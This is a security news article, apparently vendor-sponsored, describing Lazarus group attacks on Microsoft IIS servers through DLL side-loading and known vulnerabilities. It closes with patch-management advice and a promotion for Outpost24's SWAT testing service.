Microsoft IIS tightly integrates with the company's popular .NET Framework, which makes it especially suitable for hosting ASP.NET web applications. Companies use ASP.NET to build dynamic websites or web applications that interact with databases. These apps, built with ASP.NET and running on Microsoft IIS, offer excellent scalability, performance, and compatibility with the Microsoft ecosystem.

Despite being less popular than web server packages like Nginx or Apache, Microsoft IIS remains in use at 5.4% of all the websites whose web server is known. Some purported big-name users of Microsoft IIS include Accenture, Alibaba Travels, Mastercard, and Intuit.

**Lazarus Attacks on Microsoft IIS Servers**

Lazarus is a North Korean cyber espionage and cybercrime group that has recently been observed exploiting specific Microsoft IIS vulnerabilities. The gang previously conducted some of the most notorious cyberattacks in history, including 2017's WannaCry ransomware incident and the theft of $100 million of virtual currency as recently as June 2022.

While Microsoft IIS has built-in security features, it's essential to keep it updated. Historically, attackers have exploited vulnerable IIS servers that didn't have the latest patches applied. The latest spate of attacks by Lazarus mirrors this pattern, with some other added intricacies.

**Initial Round of Malicious Activity**

A May 2023 investigation conducted by South Korean cybersecurity company ASEC confirmed Lazarus threat actors actively scanning for and exploiting vulnerable Microsoft IIS servers. The initial activity centered around DLL side-loading techniques that exploited vulnerable servers to execute arbitrary code. The DLL side-loading attacks work by taking advantage of the way the IIS web server process, w3wp.exe, loads dynamic link libraries (DLLs).

By manipulating this process, Lazarus actors inserted malware into vulnerable servers. Once loaded, the DLL executes a portable file within the server's memory space. This file is a backdoor that communicates with the gang's command and control (C2) server.

On a particular note, for security teams is that the vulnerabilities targeted in these attacks for the initial breach were commonly scanned for and high-profile vulnerabilities that included Log4Shell, a vulnerability in desktop VoIP solution 3CX, and a remote code execution vulnerability in the digital certificate solution MagicLine4NX.

**Further Attacks Using IIS Servers to Distribute Malware**

A further round of malware attacks involving Microsoft IIS servers targeted the financial security and integrity-checking software, INISAFE CrossWeb EX. The program, developed by Initech, is vulnerable from version 3.3.2.41 or earlier to code injection.

Research uncovered 47 companies hit by malware that stemmed from running vulnerable versions of the Initech software process, inisafecrosswebexsvc.exe. Vulnerable versions of the CrossWeb EX load a malicious DLL, SCSKAppLink.dll. This malicious DLL then fetches a further malicious payload, and the interesting point is that the URL for the payload points to a Microsoft IIS server.

All of this adds up to the conclusion that Lazarus actors are not only exploiting common vulnerabilities to compromise Microsoft IIS servers (as per the previous section), but they are then piggy backing off the trust that most systems place in these application servers to distribute malware via compromised IIS servers.

**How to Protect Your Microsoft IIS Servers**

The technical complexities and intricacies of these Lazarus attacks can obscure the rather basic nature of how they are able to occur in the first place. There is always an initial breach point, and it's surprising how often this breach point comes down to ineffective patch management.

For example, a CISA advisory from March 2023 describes similar breaches of US government Microsoft IIS servers that arose when hackers exploited a vulnerability for which a patch has been available since 2020. The vulnerability, in this case, was in servers running Progress Telerik, a set of UI (User Interface) frameworks and app development tools.

So, here's what you can do to protect Microsoft IIS servers running in your environment:

*   Implement effective patch management that keeps software up to date with the latest versions and patches, ideally using some form of automation.
*   Use a patch management solution that accurately and comprehensively takes an inventory of all software running in your IT environment to avoid any missed patches or updates from so-called shadow IT.
*   Use the principle of least privileges for service accounts so that any services on your Microsoft IIS servers only run with the minimum permissions necessary.
*   Analyze network security logs from systems like intrusion detection systems, firewalls, data loss prevention tools, and virtual private networks. Also, analyze logs from Microsoft IIS servers and look for unexpected error messages that indicate attempts to move laterally or write files to extra directories.
*   Harden user endpoints with specialized endpoint detection and response tools that can detect advanced attacks and evasive techniques of the kind that Lazarus actors focus on.
*   Verify the functionality of patches after applying them because sometimes a patch may not install correctly due to various reasons, such as system compatibility issues, interruptions during installation, or software conflicts.

Lastly, refine your approach to vulnerability management through continuous web application security testing. As is evidenced by Lazarus' attacks, common vulnerabilities in web applications hosted on Microsoft IIS can be leveraged by adversaries to compromise the server, gain unauthorized access, steal data, or launch further attacks.

Continuous web application testing ensures that with every change in your web apps or configurations, you reassess the security posture of your infrastructure and catch vulnerabilities introduced during modifications.

Another benefit of continuous app security testing is its depth of coverage. Manual pen testing of your web apps uncovers technical and business-logic flaws that automated scanners might miss. This coverage addresses the fact that traditional vulnerability scanners may have limitations in detecting vulnerabilities in certain cases, such as in atypical software installations where file paths may deviate from the norm. Traditional periodic security assessments might leave vulnerabilities undetected for months. A continuous approach significantly reduces the time between a vulnerability's introduction and its discovery. Get Web App Security Testing with SWAT Continuous web application security testing offers a proactive and efficient solution to identify and mitigate vulnerabilities in both the apps you run on Microsoft IIS and the underlying server infrastructure. SWAT by Outpost 24 equips you with automated scanning that provides continuous vulnerability monitoring along with context-aware risk scoring to prioritize remediation efforts. You also get access to a highly skilled and experienced team of pen testers who'll scour your apps for vulnerabilities that are harder to detect with automated scanners. All these features are available in a single user interface with configurable notifications. Get a live demo of SWAT in action here and see how you can achieve a deeper level of security monitoring and risk detection.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#windows